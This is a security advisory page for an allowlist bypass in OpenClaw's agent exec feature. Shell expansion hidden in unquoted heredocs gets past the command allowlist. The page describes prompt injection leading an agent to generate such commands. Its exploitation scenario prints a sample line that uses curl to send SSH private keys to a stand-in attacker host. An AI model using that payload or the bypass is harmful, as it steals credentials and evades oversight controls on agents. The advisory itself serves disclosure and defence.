AI Threat Alert

GHSA-x3h8-jrgh-p8jx: OpenClaw: exec allowlist bypass allows hidden shell code

GHSA-x3h8-jrgh-p8jx MEDIUM
Published May 4, 2026
CISO Take

OpenClaw's exec allowlist — the mechanism designed to constrain which shell commands an AI agent may run — can be deceived by embedding shell expansion inside an unquoted heredoc body. The allowlist evaluator approves the command as written, but the shell executes the hidden expansion at runtime, enabling arbitrary code execution beyond what was authorized. With 135 prior CVEs in the same package and 4 downstream dependents, OpenClaw's security posture should already be under scrutiny for any team using it in agentic pipelines; this bypass targets a core safety boundary. Upgrade to v2026.4.22 immediately and, if upgrading is blocked, audit all allowlisted commands for heredoc syntax and temporarily prohibit heredoc usage in agent command templates.

Sources: GitHub Advisory ATLAS

What is the risk?

Medium severity overall, but elevated in AI agent deployments where the exec allowlist is the last control between LLM-driven decisions and arbitrary system command execution. Exploitation requires the ability to inject a heredoc-containing command — achievable via prompt injection or by any actor with command-submission access to the agent. No active exploitation is confirmed (not in KEV, no public exploit, no EPSS data), but the pattern of 135 CVEs in the same package signals systemic security debt. The blast radius is bounded by the agent process's runtime privileges, but autonomous agent pipelines may run with elevated permissions.

How does the attack unfold?

Allowlist Evasion
Adversary crafts a shell command containing an unquoted heredoc whose body embeds shell expansion tokens (e.g., $(...)) that the OpenClaw exec allowlist analyzer scans but does not reject.
AML.T0107
Agent Tool Invocation
The crafted command is submitted to the OpenClaw agent — directly by an attacker with command-submission access, or via a prompt injection that manipulates the agent into generating the heredoc-containing command.
AML.T0053
Shell Execution
The OS shell evaluates the heredoc body at runtime and executes the hidden shell expansion with the full privileges of the agent process, bypassing all allowlist restrictions.
AML.T0050
Impact
Attacker achieves arbitrary code execution in the agent's runtime environment, enabling credential theft, data exfiltration, lateral movement, or persistence depending on agent process privileges.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
OpenClaw npm <= 2026.4.21 2026.4.22
4 dependents 36% patched ~3d to patch Full package profile →

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

What should I do?

5 steps

  1. Upgrade openclaw to v2026.4.22 immediately (fix commit b2e8b7d4).

  2. If upgrade is blocked, audit all allowlisted commands for unquoted heredoc operators (<<) and either remove them or replace with quoted heredocs (<<'EOF').

  3. Apply least-privilege to agent execution environments — run agents in sandboxed containers with restricted filesystem and network access.

  4. Add detection for heredoc patterns in command audit logs (monitor for << tokens in agent-submitted commands).

  5. Review agent tool definitions that accept user-supplied or LLM-generated input for command template injection paths.

How is it classified?

Code Execution Auth Bypass Agent Plugin AML.T0010.005 AML.T0050 AML.T0053 AML.T0107

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
ISO 42001
8.4 - System and data controls
NIST AI RMF
MEASURE 2.5 - AI system risks are monitored and human oversight informed
OWASP LLM Top 10
LLM02 - Sensitive Information Disclosure LLM06 - Excessive Agency

Frequently Asked Questions

What is GHSA-x3h8-jrgh-p8jx?

OpenClaw's exec allowlist — the mechanism designed to constrain which shell commands an AI agent may run — can be deceived by embedding shell expansion inside an unquoted heredoc body. The allowlist evaluator approves the command as written, but the shell executes the hidden expansion at runtime, enabling arbitrary code execution beyond what was authorized. With 135 prior CVEs in the same package and 4 downstream dependents, OpenClaw's security posture should already be under scrutiny for any team using it in agentic pipelines; this bypass targets a core safety boundary. Upgrade to v2026.4.22 immediately and, if upgrading is blocked, audit all allowlisted commands for heredoc syntax and temporarily prohibit heredoc usage in agent command templates.

Is GHSA-x3h8-jrgh-p8jx actively exploited?

No confirmed active exploitation of GHSA-x3h8-jrgh-p8jx has been reported, but organizations should still patch proactively.

How to fix GHSA-x3h8-jrgh-p8jx?

1. Upgrade openclaw to v2026.4.22 immediately (fix commit b2e8b7d4). 2. If upgrade is blocked, audit all allowlisted commands for unquoted heredoc operators (<<) and either remove them or replace with quoted heredocs (<<'EOF'). 3. Apply least-privilege to agent execution environments — run agents in sandboxed containers with restricted filesystem and network access. 4. Add detection for heredoc patterns in command audit logs (monitor for << tokens in agent-submitted commands). 5. Review agent tool definitions that accept user-supplied or LLM-generated input for command template injection paths.

What systems are affected by GHSA-x3h8-jrgh-p8jx?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI-driven automation pipelines, shell-executing AI agents.

What is the CVSS score for GHSA-x3h8-jrgh-p8jx?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworksAI-driven automation pipelinesshell-executing AI agents

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: 8.4
NIST AI RMF: MEASURE 2.5
OWASP LLM Top 10: LLM02, LLM06

What are the technical details?

Original Advisory

## Summary Exec allowlist analysis rejects shell expansion in unquoted heredocs. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact An allowlisted command containing an unquoted heredoc could hide shell expansion in the heredoc body. That could make the approved command text look safer than what the shell would evaluate at runtime. ## Fix The exec command analyzer now tracks heredoc bodies, rejects unquoted heredoc expansion tokens and continuation-splice bypasses, and preserves quoted heredocs and literal safe text. ## Fix Commit(s) - b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @VladimirEliTokarev for reporting.

Exploitation Scenario

An adversary with prompt injection access to an OpenClaw agent constructs a query that causes the agent to generate a seemingly benign shell command containing an unquoted heredoc — for example, a log-writing command whose heredoc body embeds $(curl attacker.com/exfil?d=$(cat ~/.ssh/id_rsa)). The OpenClaw allowlist analyzer inspects the command text and approves it based on the outer command structure, ignoring the heredoc body. When the agent's runtime passes the command to the shell, the expansion executes out-of-band, exfiltrating SSH keys or other secrets accessible to the agent process. This mirrors the credential-exfiltration pattern observed in AIID #1368, where OpenClaw's skills ecosystem was abused for AMOS stealer delivery.

Weaknesses (CWE)

CWE-200 Exposure of Sensitive Information to an Unauthorized Actor Primary

CWE-200 — Exposure of Sensitive Information to an Unauthorized Actor: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

  • [Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.

Source: MITRE CWE corpus.

References

Timeline

Published
May 4, 2026
Last Modified
May 4, 2026
First Seen
May 5, 2026

Related Vulnerabilities

CRITICAL CVE-2026-33579 9.9

OpenClaw: scope bypass escalates low-priv to admin

Same package: openclaw
CRITICAL CVE-2026-32922 9.9

OpenClaw: privilege escalation to RCE via token scope bypass

Same package: openclaw
CRITICAL CVE-2026-53838 9.8

OpenClaw: approval scope bypass via reconnection state

Same package: openclaw
CRITICAL CVE-2026-30741 9.8

OpenClaw: RCE via request-side prompt injection

Same package: openclaw
CRITICAL CVE-2026-32038 9.8

Analysis pending

Same package: openclaw
Back to Threat Feed